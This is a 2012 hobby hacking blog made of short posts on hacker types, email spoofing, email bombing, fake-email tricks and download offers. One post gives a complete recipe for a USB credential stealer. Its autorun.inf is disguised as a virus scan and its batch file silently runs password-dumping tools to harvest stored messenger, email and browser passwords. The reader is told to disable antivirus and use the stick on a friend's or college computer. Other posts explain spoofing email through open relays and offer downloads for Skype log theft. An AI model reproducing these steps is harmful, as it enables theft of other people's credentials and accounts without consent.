Types of Hacker

Let’s see the categories of Hackers on the basis on their knowledge. Coders **The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses in software to create their own exploits. These Hackers can use those exploits to develop fully patched and secure systems.

Concept of Ethical Hacking

hi guys this is my first post i hope to present hacking A to Z 101 lets begun :) Hacking The Art of exploring various security breaches is termed as Hacking. # Computer Hackers have been around for so many years. Since the Internet became widely used in the World, We have started to hear more and more about hacking

Why Hackers Hack?

The main reason why Hackers hack is because they can hack. Hacking is a casual hobby for some Hackers — they just hack to see what they can hack and what they can’t hack, usually by testing their own systems. Many Hackers are the guys who get kicked out of corporate and government IT and security organizations. They try to bring down the status of the organization by attacking or stealing information

Steps Performed By hackers

1) Reconnaissance 2) Scanning 3) Gaining Access 4) Maintaining Access 5) Clearing Tracks • Performing Reconnaissance • Scanning and Enumeration • Gaining access • Maintaining access and Placing Backdoors • Covering tracks or Clearing Log

Prevention from Hackers

What can be done to prevent Hackers from finding new holes in software and exploiting them? Information security research teams exist—to try to find these holes and notify vendors before they are exploited. There is a beneficial competition occurring between the Hackers securing systems and the Hackers breaking into those systems. This competition provides us with better and stronger security, as well as more complex and sophisticated attack techniques.

ad

Tuesday, September 18, 2012

More Facts About Email Hacking

 

 

Consequences of fake emails








Email from your Email ID to any Security Agency declaring a Bomb Blast can make you spend rest of your life 
behind the iron bars. 

Email from you to your Girl friend or Boy friend can cause Break-Up and set your friend’s to be in relationship.

  Email from your Email ID to your Boss carrying your Resignation Letter or anything else which you can think of.  There can be so many cases drafted on Fake Emails. 

Proving a fake Email 

Every Email carry Header which has information about the Travelling Path of the Email

  Check the Header and Get the location from the Email was Sent

  Check if the Email was sent from any other Email Server or Website

  Headers carry the name of the Website on which the mail sending script was used. 

 Email Bombing

   Email Bombing is sending an Email message to a particular address at a specific victim site. In many instances, the 
messages will be large and constructed from meaningless data in an effort to consume additional system and 
network resources. Multiple accounts at the target site may be abused, increasing the denial of service impact.







Email Spamming

 

  Email Spamming is a variant of Bombing; it refers to sending Email to hundreds or thousands of users (or to lists 
that expand to that many users). Email spamming can be made worse if recipients reply to the Email, causing all 
the original addressees to receive the reply. It may also occur innocently, as a result of sending a message to 

Email Password Hacking 

 There is no specified attack available just to hack the password of Email accounts. Also, it is not so easy to compromise the Email server like Yahoo, Gmail, etc.

  Email Password Hacking can be accomplished via some of the Client Side Attacks. We try to compromise the user 
and get the password of the Email account before it reaches the desired Email server.

  We will cover many attacks by the workshop flows, but at this time we will talk about the very famous 'Phishing 
attack'.

mailing lists and not realizing that the list explodes to thousands of users, or as a result of a responder message 
(such as vacation(1)) that is setup incorrectly. 

Comming Soon Post Phising ----->>>>> 

Saturday, September 15, 2012

PHP mail Sending Script

PHP mail Sending Script

 











Wednesday, September 12, 2012

Email Spoofing

Email Spoofing

 







Email spoofing is the forgery of an Email header so that the message appears to have originated from someone or
somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients 
to open, and possibly even respond to, their solicitations. Spoofing can be used legitimately.

There are so many ways to send the Fake Emails even without knowing the password of the Email ID. The Internet 
is so vulnerable that you can use anybody's Email ID to send a threatening Email to any official personnel. 

Methods to send fake Emails 

1.Open Relay Server

2.Web Scripts

 Fake Emails: Open Relay Server

 An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way that it allows 
anyone on the Internet to send Email through it, not just mail destined ‘To’ or  ‘Originating’ from known users.

An Attacker can connect the Open Relay Server via Telnet and instruct the server to send the Email.

Open Relay Email Server requires no password to send the Email

 Fake Emails: via web script

 Web Programming languages such as PHP and ASP contain the mail sending functions which can be used to send Emails by programming Fake headers i.e.” From: To: Subject:”

 There are so many websites available on the Internet which already contains these mail sending scripts. Most of 
them provide the free service.





Monday, September 10, 2012

Back Track Full Traning Course Free Fun Hacker

Back Track Full Training Course Free From Fun Hacker

Hi hacking lovers :P .Today Im going to give a Special Present Fun Hacker Fans.Full Video course About Back Track.Only For Fun Hacker Fans.
If you Want  This Video Training Course.Please Leave You'r email below as a comment.And Don't Forget To say Thanks :)
Hope to see you in next post


Sunday, September 9, 2012

Email Security

Email Security

 






Now let’s check how secure this fast mean of communication is. There are so many attacks which are applied on
Emails. There are people who are the masters of these Email attacks and they always look for the innocent people
who are not aware of these Email tricks and ready to get caught their trap.

You have to make sure that you are not an easy target for those people. You have to secure your Email identity
and profile, make yourself a tough target

If you have an Email Id Do not feel that it does not matters if hacked because there is no important information in
that Email account, because you do not know if someone gets your Email id password and uses your Email to send
a threatening Email to the Ministry or to the News Channels.

Attacker is not bothered about your data in the Email. He just wants an Email ID Victim which will be used in the
attack. There are a lots of ways by which one can use your Email in wrong means, i am sure that you would have
come across some of the cased where a student gets an Email from his friends abusing him or cases on Porn
Emails where the owner of the Email does not anything about the sent Email.









Friday, September 7, 2012

How To Hack PC Using LAN pdf Download


hi friends today im going to give a very short ebook about how to hack pc using LAN connection.




Download Link
Download PDF

Wednesday, September 5, 2012

Configuring an Email Server

Configuring an Email Server

 





 Email server software like Post cast Server, Hmailserver, Surge mail, etc can be used to convert your Desktop PC
into an Email sending server.

  HMailServer is an Email server for Microsoft Windows. It allows you to handle all your Email yourself without
having to rely on an Internet service provider (ISP) to manage it. Compared to letting your ISP host your Email,
HMailServer adds flexibility and security and gives you the full control over spam protection




Tuesday, September 4, 2012

How to hack passwords using USB Drive

How to hack passwords using USB Drive

 




Today I will show you how to hack Passwords using an USB Pen Drive. 
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc. 
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer. 
We need the following tools to create our rootkit: 

 MessenPass:Recovers the passwords of most popular Instant Messenger programs:

MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. 

Mail PassView:Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook

2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts. 

IE Passview:IE PassView is a small utility that reveals the passwords stored by

Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0 

Protected Storage PassView:Recovers all passwords stored inside the Protected

Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more… 

 PasswordFox:PasswordFox is a small password recovery tool that allows you to view

the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.








Here is a step by step procedre to create the password hacking toolkit:

 NOTE: You must temporarily disable your antivirus before following these steps.

1.Download all the 5 tools, extract them and copy only the executables(.exe files)

into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe

into your USB Drive.

2.Create a new Notepad and write the following text into it: 

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

savethe Notepad and renameit from 

New Text Document.txtto autorun.inf

Now copy theautorun.inffile onto your USB pendrive.

3.Create another Notepad and write the following text onto it: 

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

savethe Notepad and renameit from

New Text Document.txtto launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this

pendrive on your friend’s PC or on your college computer. Just follow these steps

1.Insert the pendrive and the autorun window will pop-up. (This is because, we have

created an autorun pendrive).

2.In the pop-up window, select the first option (Perform a Virus Scan).

3.Now all the password hacking tools will silently get executed in the background

(This process takes hardly a few seconds). The passwords get stored in the .TXT

files.

4.Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the

Computer.  

you can download All software collection from below link
Download Link 




Monday, September 3, 2012

Visual Basic 6.0 Full Version Download

Visual Basic 6.0 Full Version Download


 





hi friends today i'm going to give you a gift little gift.most of people worrying to find vb 6 full version.vb 2008 or vb .net 2010 you can find easily but vb 6  little bit difficult to find. but now you can download vb6 from fun hacker  it is full version but easy to download it  is only
 84 MB compressed version you can open it by using 7 zip easily.hope you enjoy.don't forget to say thanks :P
for mobile phones


Password -  funhacker


Download VB 6.0

or

Download VB 6.0


wait 5 second and click skip Ad

 




Sunday, September 2, 2012

Hack Some One Skype Logs







 Hack Skype

hi Friends today im going to teach how to hack some one skype chat logs it is very easy

first download following software.don't be afraid thir is no keyloggers or rat ,i guaranteed . just have fun
next post i hope to  add this to pen drive and hack using pen drive

Download Link